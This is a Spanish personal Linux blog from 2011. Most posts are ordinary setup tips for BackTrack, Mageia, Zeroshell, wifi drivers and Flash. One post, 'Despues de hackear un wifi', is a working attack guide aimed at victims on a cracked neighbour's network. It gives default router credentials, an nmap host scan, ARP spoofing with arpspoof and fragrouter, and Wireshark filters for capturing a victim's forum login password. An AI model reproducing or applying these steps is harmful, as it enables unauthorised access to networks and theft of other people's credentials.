jueves, 24 de noviembre de 2011

Backtrack 5 Escritorio Gnome en Español

En el terminal instalar:

1- apt-get install language-selector
2- gnome-language-selector

2.1-En la ventana que se abre pulsamos install
2.2- Pestaña "Lenguage" Boton install/remove lenguages (Seleccionamos spain)
2.3 en la pestalla texto seleccionamos nuestro idioma y reiniciamos

viernes, 19 de agosto de 2011

Proximos retos...

Navegando por la red he visto http://www.zeroshell.net/es/ y me resulta muy interesante para el control de la red y para montar un portal cautivo que ya hace algún tiempo llamo mi atención.

(Copio y pego las utilidades de esta iso de su propia web)

*******************************zeroshell*********************************************

Router/Firewall Linux

Zeroshell es una distribución Linux para servidores y dispositivos integrados destinados a proporcionar los servicios de red principal de una LAN requiere. Está disponible en forma de Live CD o de imagen de Compact Flash y se puede configurar y administrar utilizando el navegador web. Las principales características de esta distribución de Linux para aplicaciones de red se enumeran a continuación:


Zeroshell Web GUI. Haga clic para ampliar la imagen.


De equilibrio de carga y conmutación por error de varias conexiones a Internet;

UMTS/HSDPA conexiones mediante el uso de módems 3G;

Servidor RADIUS para proporcionar una autenticación segura y la gestión automática de las claves de cifrado para el Wireless 802.11b, 802.11g y 802.11a redes que soportan el protocolo 802.1x en el EAP-TLS, EAP-TTLS y PEAP forma o la autenticación menos seguro del cliente de dirección MAC, WPA con TKIP y WPA2 con CCMP (802.11i queja) se apoyan demasiado, el servidor RADIUS también puede, en función del nombre de usuario, grupo o dirección MAC del suplicante, permitir el acceso de un 802.1Q VLAN ;

Portal Cautivo para apoyar el inicio de sesión web, en redes cableadas e inalámbricas. Zeroshell actúa como puerta de enlace de las redes en la que el portal cautivo está activo y en la que las direcciones IP (por lo general pertenecientes a las subredes privadas) son asignados dinámicamente por el servidor DHCP. Un cliente que tiene acceso a esta red privada debe autenticarse a través de un navegador web utilizando Kerberos 5 nombre de usuario y contraseña antes de que el firewall del Zeroshell permite al público acceder a la LAN. El Captive Portal se utilizan a menudo para proporcionar acceso autenticado a Internet en los hotspots en alternativa al protocolo de autenticación 802.1X demasiado complicado de configurar para los usuarios. Zeroshell implementa la funcionalidad de Portal Cautivo en forma nativa, sin necesidad de utilizar otro software específico NoCat o Chillispot;

QoS (Quality of Service) y de gestión de tráfico para controlar el tráfico en una red congestionada. Usted será capaz de garantizar el ancho de banda mínimo, limitar el ancho de banda máximo y asignar una prioridad a una clase de tráfico (útil en aplicaciones de red sensibles a la latencia como VoIP). El ajuste anterior se puede aplicar en interfaces Ethernet, redes privadas virtuales, bridges y bondings VPN. Es posible clasificar el tráfico mediante el uso de L7 filtros que permitan la inspección profunda de paquetes (DPI), que puede ser útil para dar forma a las aplicaciones de VoIP y P2P;

Servidor proxy de HTTP que es capaz de bloquear las páginas web que contienen virus. Esta característica se implementa con la solución antivirus ClamAV y el servidor proxy HAVP. El servidor proxy trabaja en proxy transparente el modo en el que, no es necesario configurar los navegadores de los usuarios a usarlo, pero las peticiones http será redirigido automáticamente;

Punto de acceso inalámbrico con múltiples SSID y VLAN de apoyo utilizando las tarjetas de red WiFi basada en el chipset Atheros. En otras palabras, un cuadro de Zeroshell con uno de tales tarjetas WiFi podría convertirse en un punto de acceso IEEE 802.11a/b/g proporciona autenticación fiable y el intercambio de claves dinámicas de 802.1X y protocolos WPA. Por supuesto, la autenticación se lleva a cabo con EAP-TLS y PEAP sobre el servidor RADIUS integrado;

Host-a-LAN VPN con L2TP/IPsec en el que L2TP (Layer 2 Tunneling Protocol) autenticado con Kerberos v5 nombre de usuario y la contraseña es encapsulado dentro de IPSec autenticada con IKE que utiliza certificados X.509;

VPN Lan-to-LAN con la encapsulación de datagramas Ethernet en SSL/TLS de túnel, con soporte para VLAN 802.1Q y configurar en la vinculación de balanceo de carga (aumento de banda) o la tolerancia a fallos (aumentar la fiabilidad);

Enrutador con rutas estáticas y dinámicas (RIPv2);

Bridge 802.1d con protocolo Spanning Tree para evitar bucles, incluso en la presencia de rutas redundantes;

LAN virtual 802.1Q (VLAN etiquetado);

Firewall Packet Filter y Stateful Packet Inspection (SPI) con filtros aplicables en las dos rutas y bridges en todo tipo de interfaces, incluyendo VPN y VLAN;

Es posible rechazar o forma de uso compartido de archivos P2P tráfico mediante el uso de iptables IPP2P módulo en el Firewall y QoS clasificador;

NAT para utilizar la red LAN clase de direcciones privadas ocultas en la WAN con direcciones públicas;

Port Forwarding TCP/UDP (PAT) para crear servidores virtuales. Esto significa que clúster de servidores reales se verán con una única dirección IP (la IP del servidor virtual) y cada solicitud será distribuido con Round Robin algoritmo a los servidores reales;

Multizona servidor DNS con la gestión automática de la Resolución Inversa in-addr.arpa;

Subred multi servidor DHCP con la posibilidad de IP fija en función de la dirección MAC del cliente;

Cliente PPPoE para la conexión a la WAN a través de ADSL, DSL y líneas de cable (requiere un adecuado MODEM);

Cliente de DNS dinámico para llegar fácilmente a la sede, incluso cuando la IP es dinámica;

NTP (Network Time Protocol) del cliente y el servidor host para mantener sincronizados los relojes;

Servidor Syslog para la recepción y catalogación de los registros del sistema producido por los hosts remotos, incluidos los sistemas Unix, routers, switches, puntos de acceso Wi-Fi, impresoras de red y otros compatibles con el protocolo syslog;

Autenticación Kerberos 5 utilizando un enfoque integrado y transversal KDC-autenticación entre reinos (cross-authentication);

LDAP, NIS y RADIUS autorización;

X509 entidad emisora ​​de certificados para la emisión y gestión de certificados electrónicos;

Unix y Windows Active Directory mediante la interoperabilidad LDAP y Kerberos 5 de autenticación reino cruz.
Zeroshell es una distribución Live CD, es decir, que no es necesario instalarlo en el disco duro, ya que puede operar directamente desde el CD-ROM en el que se distribuye. Obviamente, la base de datos, que contiene todos los datos y la configuración, se pueden almacenar en ATA, SATA, SCSI y discos USB. Cualquier Corrección de errores de seguridad se pueden descargar desde el sistema de actualización automática a través de Internet e instalado en la base de datos. Estos parches se eliminará automáticamente de la base de datos de las versiones posteriores del Zeroshell Live CD que ya contiene las actualizaciones.

También está disponible una imagen Compact Flash de 512 MB útil si tiene que iniciar el cuadro de este dispositivo en lugar de CD-ROM por ejemplo, en dispositivos integrados para aplicaciones de red. La imagen Compact Flash tiene 400 MB disponibles para almacenar la configuración y datos.

El nombre Zeroshell subraya el hecho de que, si bien se trata de un sistema Linux (tradicionalmente administrable desde una consola), todas las operaciones de administración se puede realizar a través de interfaz web: de hecho, después de haber asignado una dirección IP a través de una terminal VGA o de serie , basta con conectarse a la dirección asignada por medio de un navegador para configurar todo. Zeroshell fue probado con éxito para trabajar con Firefox 1.0.6 +, Internet Explorer 6 +, Netscape 7.2 + e + Mozilla 1.7.3.

Construcción Zeroshell

Zeroshell no se basa en una distribución ya existentes como por ejemplo Knoppix está basada en Debian. El autor ha recopilado todo el software de los cuales la distribución se compone a partir del código fuente en el tar.gz o tar.bz2 paquetes. El compilador gcc y el glibcs ​​de la GNU han sido recopilados demasiado y he tenido la denominada fase de arranque en el que se ha recompilado más veces. Esto ha sido necesario para optimizar el compilador y para eliminar todas las dependencia de la glibcs ​​del sistema desde el que la primera recopilación se llevó a cabo. Algunas de las secuencias de comandos de inicialización, así como las directrices seguidas por el autor son las de Linux From Scratch. Para obtener una lista de los software de aspecto usado aquí.


(ya lo estoy bajando! cuando tenga tiempo y organice mis proyectos posteare mas :) )

martes, 16 de agosto de 2011

Mageia Sudoers

El Usuario que creamos en la instalación de Mageia por defecto no tiene derechos de sudoer, por tanto se dificulta la administración de nuestro SO por ejemplo no podemos instalar mediante $sudo urpmi y no tenemos que abusar de la sesion de administrador #root

Para darle permios

1- Abrimos Terminar y nos logeamos como root

$su
$pass
#

2- editamos fichero sudoers que esta en /etc/sudoers

#gedit /etc/sudoers

(se abrirá el editor Gedit con el fichero sudoers)

3- Localizamos una linea con
root ALL=(ALL) ALL

y añadimos acto seguido otra idéntica con el nombre de nuestro usuario. Tendría que quedar asi
root ALL=(ALL) ALL
miUsuario ALL=(ALL) ALL


mageia problemas Flash y wifi

Al instalar Mageia vi su limpia y cuidada apariencia y lógicamente en los tiempos que corren fui a conectarme Internet rápidamente.

Wifi: "inalámbrica Intel ProWireless 2200b/g"
Problemas con el driver de la tarjeta, al buscar la red me recomendaba la instalacion en /lib/frimeware el driver de una web de drivers de linux
cual fue mi sorpresa tas seguir las indicaciones de que NO FUNCIONA!!!
finalmente encontré el rpm correcto
ipw2200-firmware-2.4-3.1.2006.0mdk.noarch.rpm
reinicie y funciono correctamente.

Cansado de pelear con el wifi me dispuse a ver una película Pero el maldito flash Player no funcionaba...
imagino que para los que no utilicen x64 no tendran problemas al instalar el RPM de la web pero yo con 64 si que he tenido.

El resultado lo encontré en la web

http://blogdrake.net/blog/pacho/flashplayer-7-en-navegadores-64-bits

FlashPlayer 7 en navegadores 64 bits

Enviado por pacho el 27 Julio, 2006 - 23:13
Introducción

Macromedia (o Adobe) no ha sacado aún versión de su flash para navegadores de 64 bits, pero eso no quiere decir que no podamos tener flash en dichos navegadores.

No creáis que os voy a decir que instaléis gnash o gplflash (alternativas libres que he probado, pero que aún considero muy verdes :( ), esto es para usar el actual plugin de flashplayer en nuestros navegadores de 64 bits.

Para ello usamos nspluginwrapper, que servirá tanto para el plugin de flash como para otros plugins de 32 bits (como el de acroread o el de realplayer).
Modo de proceder

1. Descargamos el plugin de flash y lo que necesitamos de nspluginwrapper:


wget http://macromedia.rediris.es/rpm/mandrake/flash-plugin-7.0.63-1.i386.rpm
wget http://www.gibix.net/projects/nspluginwrapper/files/nspluginwrapper-i386-0.9.90.1-1.x86_64.rpm
wget http://www.gibix.net/projects/nspluginwrapper/files/nspluginwrapper-0.9.90.1-1.x86_64.rpm

2. Instalamos el plugin de Flash


urpmi flash-plugin-7.0.63-1.i386.rpm

3. Instalamos nspluginwrapper


urpmi nspluginwrapper-i386-0.9.90.1-1.x86_64.rpm nspluginwrapper-0.9.90.1-1.x86_64.rpm

4. Relanzamos nuestro navegador ;-)

Configuración y funcionamiento

Al instalar nspluginwrapper, éste detectará los plugins que actualmente tenemos instalados y los configurará para su funcionamiento (por eso he instalado antes el flashplayer). Si posteriormente queremos hacer que otro plugin funcione con nspluginwrapper, no es necesario reinstalar éste ultimo, basta con ejecutar (como root):


nspluginwrapper -i ~/...../xxx.so

Para quitar un plugin:

nspluginwrapper -r ~/...../xxx.so

Tras hacer estas operaciones es necesario actualizar la base de datos de nspluginwrapper para que los cree sus plugins en los directorios necesarios:

nspluginwrapper -v -a -u

Saludos



Adios Adios Ubuntu!

La verdad que siempre he estado orgulloso de utilizar ubuntu! Es una distro muy buena con una comunidad muy extenensa (Lado muy fuerte para los que somos novatos en linux) que se ha adaptado muy bien al usuario final! encargándose de "enchufar y funcionar" solo recuerdo problemas con mi wifi y en la distro 8.04 con el audio de mi portátil.

La ultima verision de ubuntu 11.04 mi primera opinion "Jo como se han currado el escritorio" Despues de usarlo "Jo que coñazo de escritorio"
lo elementos minimizados muy incomodo despues volver a lanzarlos

El cambio de escritorio tambien se volvio muy incomodo, pero lo que realmente me mosqueo fue ver la especie de MARKET de PAGO que han montado... tal vez un paso inhabitable pero me jode lo pesetero en el mundo de LINUX.

Fue entonces cuando realmente pensé en cambiar de aires...
Realmente habia coquetado un poquito con kornopix y centOS y con sucedanios de ubuntu xubuntu Kbuntu etc pero poco...


en twitter pregunte a @linux_spain (Gente de linux magazine) que distro me recomendaban y me contestaron Mageia o Mint Como linux Mint me sonaba mucho a Ubuntu, me decante por bajar Mageia, no tenia ni idea de http://www.mageia.org/es/ pero la web me gusto y el proyecto parecia interesante... Tengo que reconocer que empece a descargarlo sin saber ni de donde venia.. Por lo visto Mageia es un Fork de Mandrake (Por tanto RPMs) nuevos aires ;)
me descargue Mageia 1 x64 4GB de descarga (Una pasada....)(No se si fue una gran idea pero aquí esta instalado)...

Intente instalarlo en VirtualBox ya que ultimamente he tenido muchas decepciones con distros de Linux, pero por A o por B no me dejaba ya que decia que no tenia una arquitectura de x64 mi impaciencia no me dejo investigar mucho de modo que agarre el portatil HP dv4_es 4gb ram x64 intel borre ubuntu e instala Mageia.
La instalacion es muy agradable y amigable, no puedo destacar ni el mas mínimo problema puedes seleccionar el tipo de escritorio (en mi caso Gnome )
al iniciar de nuevo vi una presentacion del GRUBS muy agradable y elegante y el arranque hasta el escritorio muy agradabletambien .

Problemillas Wifi y flash primera odisea...

miércoles, 19 de enero de 2011

Despues de hackear un wifi

( Seguro que existen tecnicas mejores... pero esta es la mia...)

Hace un par de notas explique como hakear un wifi con backtrack o linux ( en el enlace http://naciounaidea.blogspot.com/2011/01/crack-wifi.html)
ahora explicare algunas cosillas que hacer una vez lo hemos hackeado...



los pass que petamos eran tipo telefonica clave WEP

a los ruters de telefonica accedemos por la pagina web 192.168.1.1 que es la puerta de enlace por defecto

y el usuario y contraseña por defecto es usu: 1234 y pass: 1234



si damos un vistazo al router ( en mi caso el clasico telefonica) zyxel en el apartado " Maintenance " > DHCP tables

veremos un listado de los ordenadores que estan conectados (puede q algunos no porq esten caducadas las sesiones)

y podemos ver su IP y mac



Desde nuestro linux instalaremos lo siguiente:

sudo apt-get install nmap (el famoso scaner)

sudo apt-get install dsniff (un sniffer)

sudo apt-get install wireshark (sniffer grafico)

sudo apt-get install fragrouter (para devolver el trafico)



utilizaremos una tecnica que se comonce como el man in the middele

(explicacion cutre)

consiste en engañar al router diciendole que nuestro ordenador es el de la victima de modo que su informacion

pasara por el nuestro y podremos ver sus contraseñas



seleccionando victima!

en la tabla del router como decimos puede estar caducadas las victimas por eso es mejor buscarlas en directo

para ello abriremos una consola i utilizaremos NMAP



#sudo nmap -sP 192.168.1.*

(esto hace un scaneo general de la ret)

en mi caso he escogido la 192.168.1.37 como victima



ya no necesitaremos mas datos

en nuestra consola miramos los siguientes datos con un #ifconfig

puerta de enlace ( el router) en telefonica por defecto 192.168.1.1

y nuestra interface en mi caso Wlan0 (si estais por wifi la q tenga buestra ip)





abrimos una consola i utilizamo Dsniff

#sudo arpspoof -i TARJETA_RED -t IP_VICTIMA IP_ROUTER

en mi caso:

sudo arpspoof -i wlan0 -t 192.168.1.37 192.168.1.1

lo dejamos en ejecucion

en otra consola

#sudo fragrouter -i wlan0 -B1



ya esta pasando todo el trafico de la victima por nuestra maquina





para realizar el ejemplo ire a un objetivo concreto el pass de f.com

si hacemos boton derecho ver codigo fuente veremos que la informacion del logeo veremos como el name del parametro es vb_login_password

abrimos Wireshark (en modo root)

en un terminal sudo wireshark.

es muyy simple por defecto la interfaz que tiene la ip damos a start

y filtraremos los paquetes

filter tcp contains login_password

cuando la victima acceda a f.com y se loguee veremos una entrada
http://www.blogger.com/img/blank.gif
boton derecho del raton "Follow tcp steam" y unicamente tenemos q buscar "vb_login_password" comentado anteriormente y tendremos su pass



me da palo seguir ya me lo currare mejor otro dia lo mismo cuelgo imageneres

salu2

(hace falta tener un servidor de correo instalado)

Tecleamos Respuesta del servidor

Telnet al servidor en el puerto 25



HELO nuestro nombre de dominio



MAIL FROM: (ej, tu cuenta de correo)



RCPT TO: (la cuenta de correo del destinatario) 2



DATA Nos indica que podemos enviar la data, luego CRLF punto CRLF al final



Escribimos el mensaje luego punto (ej, escriban un punto en un linea nueva y luego presionamos ENTER) 250



QUIT